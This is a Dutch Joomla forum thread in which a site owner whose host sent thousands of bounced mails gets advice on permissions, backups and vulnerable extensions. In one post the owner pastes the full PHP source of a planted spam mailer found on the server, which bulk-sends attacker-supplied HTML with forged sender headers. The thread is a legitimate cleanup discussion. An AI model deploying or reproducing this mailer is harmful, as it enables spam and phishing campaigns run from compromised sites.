Skip to main content

Welkom bij Joomla!NL

Om alle mogelijkheden van dit forum te kunnen gebruiken, moet je je eerst registreren.

Vermeld in iedere vraag duidelijk:
  1. De versie van Joomla! 2.5 die je gebruikt
  2. De volledige url van je website indien mogelijk.
  3. De versie van de extensie waar de vraag over gaat.

opgelost Site gehacked DEAD.letter geplaatst

Site gehacked DEAD.letter geplaatst

29 okt 2013 18:47
#13

MAP-Rechten, ik verander daar zelf niets aan, maar hoe moeten welke staan, Ik heb geen idee

755 voor mappen en 644 voor bestanden.
Groetjes, Astrid
Gebruik de zoekfunctie van dit forum voordat je een nieuwe vraag plaatst.
Vragen uitsluitend via dit forum.
yndi.nl - kvk 17157725 		Is je vraag beantwoord? Dan kan je het draadje zelf sluiten .
Wil je Joomla!NL steunen? Dat kan met een donatie.

Discussie gesloten.
  • Astrid
  • Astrid's Profielfoto
  • Moderator + Technisch team
  • Moderator + Technisch team
  • Berichten: 37142

Site gehacked DEAD.letter geplaatst

30 okt 2013 08:55
#14
Aanvulling op Astrid.

configuration.php bij voorkeur op 444 (mits je hosting omgeving dit accepteert, anders op 644)
Discussie gesloten.
  • Otto
  • Otto's Profielfoto
  • Bezoeker
  • Bezoeker

Site gehacked DEAD.letter geplaatst

30 okt 2013 10:02
#15
Mappen staan op 755
Bestanden staan op 644
Configuration.php staat op 444
map .procmail staat op 711 = is dat OKE ?
Discussie gesloten.
  • EdGrassere
  • EdGrassere's berichtenfoto Heeft onderwerp gestart
  • Regelmatige bezoeker van Joomla!NL
  • Regelmatige bezoeker van Joomla!NL
  • Berichten: 246

Site gehacked DEAD.letter geplaatst

30 okt 2013 10:19
#16
.procmail is geen Joomla map. Zou hierover even contact met je hoster opnemen.
Groetjes, Astrid
Gebruik de zoekfunctie van dit forum voordat je een nieuwe vraag plaatst.
Vragen uitsluitend via dit forum.
yndi.nl - kvk 17157725 		Is je vraag beantwoord? Dan kan je het draadje zelf sluiten .
Wil je Joomla!NL steunen? Dat kan met een donatie.

Discussie gesloten.
  • Astrid
  • Astrid's Profielfoto
  • Moderator + Technisch team
  • Moderator + Technisch team
  • Berichten: 37142

Site gehacked DEAD.letter geplaatst

30 okt 2013 10:32
#17
Blijkt inderdaad van hoster te zijn en moet zo staan.

Ik heb een bestand gevonden dat volgens van de hackers is met volgende inhoud
Code:
<?php $testa = $_POST['veio']; if($testa != "") { $message = $_POST['html']; $subject = $_POST['assunto']; $nome = $_POST['nome']; $de = $_POST['de']; $to = $_POST['emails']; $headers = "MIME-Version: 1.0\r\n"; $headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; $email = explode("\n", $to); $headers .= "From: ".$nome." <".$de.">\r\n"; $message = stripslashes($message); $i = 0; $count = 1; while($email[$i]) { $ok = "ok"; if(mail($email[$i], $subject, $message, $headers)) echo "* N&#250;mero: $count <b>".$email[$i]."</b> <font color=green>Google OK!</font><br><hr>"; else echo "* N&#250;mero: $count <b>".$email[$i]."</b> <font color=red>Google ERROR!</font><br><hr>"; $i++; $count++; } $count--; if($ok == "ok") echo ""; } ?> <html> <head> <title>:: ENVIADORES GOOGLE - PRIV8 ::</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style> body { margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0; } .titulo { font-family: Arial, Helvetica, sans-serif; font-size: 70px; color: #000000; font-weight: bold; } .normal { font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #000000; } .form { font-family: Arial, Helvetica, sans-serif; font-size: 10px; color: #333333; background-color: #FFFFFF; border: 1px dashed #666666; } .texto { font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; } .alerta { font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; color: #990000; font-size: 10px; } </style> </head> <body> <form action="" method="post" enctype="multipart/form-data" name="form1"> <input type="hidden" name="veio" value="sim"> <table width="590" height="511" border="0" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC" class="normal"> <tr> <td width="588" height="25" align="center" bgcolor="#FFFFFF"><A href="http://www.goglogo.com/s.asp?lo=Search+Nem%2DMartins" border="0"><IMG border=0 src="http://www.goglogo.com/images/m3l.gif"><IMG border=0 src="http://www.goglogo.com/images/a0.gif"><IMG border=0 src="http://www.goglogo.com/images/r1.gif"><IMG border=0 src="http://www.goglogo.com/images/t2.gif"><IMG border=0 src="http://www.goglogo.com/images/i3.gif"><IMG border=0 src="http://www.goglogo.com/images/n0.gif"><IMG border=0 src="http://www.goglogo.com/images/s1.gif"></A>&nbsp; </tr> <tr> <td height="194" valign="top" bgcolor="#FFFFFF"> <table width="100%" border="0" cellpadding="0" cellspacing="5" class="normal" height="444"> <tr> <td align="right" height="17"><span class="texto"><font size="3">De:<br> <br> E-mail:</font> </span></td> <td width="65%" height="17"> <input name="nome" type="text" class="form" id="nome" style="width:50%" value="" size="1" > <br> <br> <input name="de" type="text" class="form" id="de" style="width:49%" value="" size="1"></td> </tr> <tr> <td align="right" height="20"><font size="3"><span class="texto"><br> Assunto:</span></font></td> <td height="17"> <br> <input name="assunto" type="text" class="form" id="assunto" style="width:100%" value="" size="1" ></td> </tr> <tr align="center" bgcolor="#FFFFFF"> <td height="17" colspan="2"><span class="texto"><font size="3"><br> C&oacute;digo HTML:<br> </font></span></td> </tr> <tr align="right"> <td height="146" colspan="2" valign="top"><br> <textarea name="html" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="html" cols="1">Coloque sua Engenharia. </textarea> <span class="alerta"><font color="#FF0000">*TEXTO EM HTML</font></span></td> </tr> <tr align="center" bgcolor="#FFFFFF"> <td height="47" colspan="2"><p><span class="texto"><font size="3">Lista de emails:</font></span></td> </tr> <tr align="right"> <td height="136" colspan="2" valign="top"><font color="#003399"><br> <textarea name="emails" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="emails" cols="1">Coloque sua Lista de Emails. </textarea> <span class="alerta"><font color="#FF0000">*SEPARADO POR QUEBRA DE LINHA</font></span></font></td> </tr> <tr> <td height="26" colspan="2" align="right" valign="top" bgcolor="#FFFFFF"><div align="center"> <input type="submit" name="Submit" value="[__________+++Google Sender+++__________]"> </div></td> </tr> </table> </td> </tr> <tr> <td height="15" align="center" bgcolor="#FFFFFF"><font size="4" face="Verdana, Arial, Helvetica, sans-serif"><strong>.............................PowereD bY r00t.............................</strong></font></td> </tr> </table> <div align="left"></div> </form> </body>
Kunnen jullie hier iets mee ?
Discussie gesloten.
  • EdGrassere
  • EdGrassere's berichtenfoto Heeft onderwerp gestart
  • Regelmatige bezoeker van Joomla!NL
  • Regelmatige bezoeker van Joomla!NL
  • Berichten: 246

Site gehacked DEAD.letter geplaatst

30 okt 2013 10:40
#18
Nee, en een enkel bestand wil nog niets zeggen. Zoals al eerder aangegeven: zet een schone backup terug. Enige andere mogelijkheid om alles eruit te krijgen is eventueel om je mappen en bestanden naar je computer te halen, lokaal een schone kopie site te installeren met exact dezelfde extensies (hoeft verder geen content of zo in te staan) en de twee sites met WinMerge te vergelijken.
Kans is namelijk groot dat er nog ergens een javascript of andersoortig bestandje staat dat net zo snel als jij bestandjes verwijdert, die bestandjes weer terugzet.
Groetjes, Astrid
Gebruik de zoekfunctie van dit forum voordat je een nieuwe vraag plaatst.
Vragen uitsluitend via dit forum.
yndi.nl - kvk 17157725 		Is je vraag beantwoord? Dan kan je het draadje zelf sluiten .
Wil je Joomla!NL steunen? Dat kan met een donatie.

Discussie gesloten.
  • Astrid
  • Astrid's Profielfoto
  • Moderator + Technisch team
  • Moderator + Technisch team
  • Berichten: 37142

Site gehacked DEAD.letter geplaatst

30 okt 2013 10:53
#19
Ja Astrid, heb al de oudste backup die ik heb terug gezet, helaas lost dat het probleem niet op.
Opnieuw op zetten van de site lokaal heb ik op dit moment geen tijd voor.

Volgens mijn hoster zijn ze binnengekomen via de simplepie module.
Via de online scans zoals :Sucuri site check & onlinelink scan kan ik het probleem niet vinden.

Als het niet anders kan zal ik hem lokaal opnieuw moeten bouwen.
Discussie gesloten.
  • EdGrassere
  • EdGrassere's berichtenfoto Heeft onderwerp gestart
  • Regelmatige bezoeker van Joomla!NL
  • Regelmatige bezoeker van Joomla!NL
  • Berichten: 246

Site gehacked DEAD.letter geplaatst

30 okt 2013 12:48 - 30 okt 2013 12:48
#20
Hallo Ed,

Niet om het 1 of ander, maar wees je bewust van het volgende.

Als je een dead.letter bestand hebt, dan gaat het om een niet af te leveren mailbericht. (Linux/Unix host)
Dat staat volledig los van het al dan niet gehackt zijn.

Waaruit blijkt volgens jou dat je gehackt bent?
Laatst bewerkt 30 okt 2013 12:48 door Otto.
Discussie gesloten.
  • Otto
  • Otto's Profielfoto
  • Bezoeker
  • Bezoeker

Site gehacked DEAD.letter geplaatst

30 okt 2013 12:50
#21
Hoi Otto,

Ik kreeg bijna 9000 mails in mijn mailbox die niet konden worden afgeleverd.
En mijn hoster melde mij dat ik was gehacked.
Discussie gesloten.
  • EdGrassere
  • EdGrassere's berichtenfoto Heeft onderwerp gestart
  • Regelmatige bezoeker van Joomla!NL
  • Regelmatige bezoeker van Joomla!NL
  • Berichten: 246

Site gehacked DEAD.letter geplaatst

30 okt 2013 13:27
#22
Hoi Ed,

Als je site 9.000 e-mails verstuurd, dan hoef je niet gehackt te zijn.
Dit wordt in veel gevallen door een lekke extensie veroorzaakt die je gebruikt.

Je maakt al gebruik van de nieuwste versie van Joomla 2.5, maar van welke extensies maak je gebruik?
Zijn deze up-to-date?
Staan er extensies die je gebruikt op de vulnarable extensie list?
Maak je gebruik van een captcha of andere wijze om misbruik van je formulieren te voorkomen?

Uit het mailbestand dat je geplaatst hebt valt niet te herleiden waardoor en waarmee het gegenereerd is.
Als je toegang hebt tot SMTP server, dan kun je eventueel het exact verzendende pad op de server achterhalen.

Ik vermoed dat je niet gehacked bent, maar als mail relay misbruikt wordt.
Discussie gesloten.
  • Otto
  • Otto's Profielfoto
  • Bezoeker
  • Bezoeker

Site gehacked DEAD.letter geplaatst

30 okt 2013 14:58
#23
Hoi Otto,

Denk het ook als ik jou comment lees.
OP de vulnarable extensie list staan 2 extenties die ik gebruik :
- XMAP
- SH404SEF
Zal deze verwijderen en eens kijken of dat helpt
Discussie gesloten.
  • EdGrassere
  • EdGrassere's berichtenfoto Heeft onderwerp gestart
  • Regelmatige bezoeker van Joomla!NL
  • Regelmatige bezoeker van Joomla!NL
  • Berichten: 246

Site gehacked DEAD.letter geplaatst

30 okt 2013 15:12
#24
Hoi Ed,

Update deze beide naar de laatste versie. Verwijderen is niet noodzakelijk.
Als men e-mails verzend, gebeurt dit meestal via formulieren of tell-a-friend functies.

Wat gebruik je hiervoor?
Discussie gesloten.
  • Otto
  • Otto's Profielfoto
  • Bezoeker
  • Bezoeker
Moderators: Juliank92PeterJelleRomke
Tijd voor maken pagina: 0.884 seconden

Wil je Joomla!NL steunen?

Steun Joomla!NLAlle teamleden werken enthousiast, op vrijwillige basis, mee aan Joomla!NL. Maar een website met forum kost nu eenmaal geld. Dus als je Joomla!NL wilt steunen, dan kan dat, graag zelfs!

Lees hier meer informatie